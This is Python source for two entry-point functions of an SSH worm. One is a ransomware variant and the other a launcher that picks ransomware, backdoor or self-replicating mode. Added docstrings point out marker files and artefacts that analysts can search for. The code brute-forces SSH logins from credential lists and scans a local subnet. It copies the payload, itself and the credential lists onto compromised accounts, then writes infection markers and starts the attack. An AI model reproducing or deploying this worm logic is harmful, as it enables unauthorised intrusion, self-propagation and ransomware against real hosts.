def main():
    """
    Entry point of the ransomware variant of the SSH worm; the original note
    says it is very similar to the replicator script.

    Reads two positional command-line arguments (a username list and a
    password list), asks the SSHConnection helper for a reachable host that
    does not yet hold the marker file, copies the payload, this script, the
    helper module and both credential lists into the compromised account's
    home directory, records the infecting host's IP in the marker file, and
    starts the payload through launch_attack().

    Artefacts visible in this function that an analyst can search for on a
    suspected host: "ransom_marker.txt", "local_attack.py", "SSHConnection.py"
    and the two credential list files under /home/<user>/.
    """
    malicious_file = "local_attack.py"
    marker_file = "ransom_marker.txt"

    # Grab files with usernames and passwords
    parser = argparse.ArgumentParser()
    parser.add_argument("usernames", nargs=1, help="File of usernames to try", type=str)
    parser.add_argument("passwords", nargs=1, help="File of passwords to try", type=str)
    args = parser.parse_args()

    worm = SSHConnection()

    # Consider changing this to allow files in other directories to be used ?
    # basename() drops any directory part, so the lists are referred to by
    # bare file name from here on.
    username_file = os.path.basename(args.usernames[0])
    password_file = os.path.basename(args.passwords[0])
    # presumably registers the files the helper works with; set_files() is
    # defined in SSHConnection.py, not shown here
    worm.set_files([malicious_file, username_file, password_file])

    # Search the first 10 IPs on the network (per the original comment; the
    # scan itself lives in SSHConnection.retrieve_vulnerable_hosts).
    worm.retrieve_vulnerable_hosts("192.168.1.", 10)

    # Set the file the worm will look for on the target system
    worm.set_worm_file(marker_file)

    if worm.find_target_host():
        # Found an unmarked host, copy the files over to it.
        worm.set_target_dir("/home/" + worm.username + "/")
        transfer_file(worm, malicious_file)
        transfer_file(worm, __file__)
        transfer_file(worm, "SSHConnection.py")
        # The cleartext credential lists travel with the worm, so they are
        # left on every host it reaches.
        transfer_file(worm, username_file)
        transfer_file(worm, password_file)
        print ("[+] Completed! Launching local attack now...")
        # Appends the infecting machine's IP to the marker file over the SSH
        # session. The path is relative; presumably it resolves to the remote
        # login directory. For responders, the marker contents give the
        # previous hop in the infection chain.
        worm.ssh_connection.exec_command("echo " + get_local_ip() + " >> " + marker_file)
        launch_attack(worm, malicious_file)
    else:
        print (" :( No target found, better get a job! ")
def main():
    """
    Entry point of the combined worm script (Python 2: uses print statements).

    Picks one of three modes from sys.argv[1] (ransomware, backdoor, or plain
    replicator), each with its own marker file and marker message. It then
    asks the SSHConnection helper for a reachable host without that marker,
    copies every command-line argument plus SSHConnection.py into the
    compromised account's home directory, writes the marker file, and starts
    the selected payload through launch_attack().

    Marker file names visible here, usable as host indicators:
    "ransom_marker.txt", "backdoor_marker.txt", "replicator_marker.txt".
    """
    worm = SSHConnection()

    # # # Arguments Reference # # # # # # # # # # # # # # # # # # # #
    # current_script = sys.argv[0]
    # local_attacker = sys.argv[1] or empty for standard replication
    # marker_file    = sys.argv[2]
    # username_file  = sys.argv[3]
    # password_file  = sys.argv[4]
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # NOTE(review): the branches below read argv[2]/argv[3] as the username
    # and password files and hard-code the marker name, so the reference
    # above does not match the code as written.

    # Every argument is treated as a file to carry along, including the
    # script's own path in sys.argv[0].
    files = []
    for filename in sys.argv:
        files.append(filename)
    files.append("SSHConnection.py")

    # Running ransomware worm
    if files[1] == "local_ransom.py":
        worm.marker_file = "ransom_marker.txt"
        worm.set_username_file(files[2])
        worm.set_password_file(files[3])
        worm.set_worm_file("local_ransom.py")
        malicious_file = files[1]
        message = "Help plz I need money to feed my cats :( \n"
    # Running backdoor worm
    elif files[1] == "local_backdoor.py":
        worm.marker_file = "backdoor_marker.txt"
        worm.set_username_file(files[2])
        worm.set_password_file(files[3])
        worm.set_worm_file("local_backdoor.py")
        malicious_file = files[1]
        message = "This is a super imporant file that under no circumstances should you delete\n"
    # Running standard replicator worm
    elif files[1] == "usernames.txt":
        worm.marker_file = "replicator_marker.txt"
        worm.set_username_file(files[1])
        worm.set_password_file(files[2])
        #worm.worm_file = "replicator.py"
        worm.set_worm_file("replicator.py")
        # Here the "payload" is the replicator itself, re-invoked with the
        # same credential lists.
        malicious_file = "replicator.py " + worm.username_file + " " + worm.password_file
        message = "Your security is bad and you should feel bad\n"
    else:
        print "Bad input file"
        return

    #files.append(worm.marker_file)

    # Search the first 10 IPs on the network (per the original comment; the
    # scan itself lives in SSHConnection.retrieve_vulnerable_hosts).
    worm.retrieve_vulnerable_hosts("192.168.1.", 10)

    # Set the file the worm will look for on the target system
    if worm.find_target_host():
        # Found an unmarked host, copy the files over to it.
        worm.set_target_dir("/home/" + worm.username + "/")
        #with open(worm.marker_file, "w") as marker:
        #    marker.write(message)
        for filename in files:
            transfer_file(worm, filename)
        print "[+] Completed! Launching local attack now..."
        # Optional command to add infector's ip to the marker file
        #worm.ssh_connection.exec_command("echo " + get_local_ip() + " >> " + worm.marker_file)
        # The marker is created and filled over the SSH session. The path is
        # relative; presumably it resolves to the remote login directory.
        worm.ssh_connection.exec_command("touch " + worm.marker_file)
        worm.ssh_connection.exec_command("echo \"" + message + "\" >> " + worm.marker_file)
        launch_attack(worm, malicious_file)
    else:
        # Either no hosts found, or they all had the marker file on their system
        print " :( No target found, better get a job!"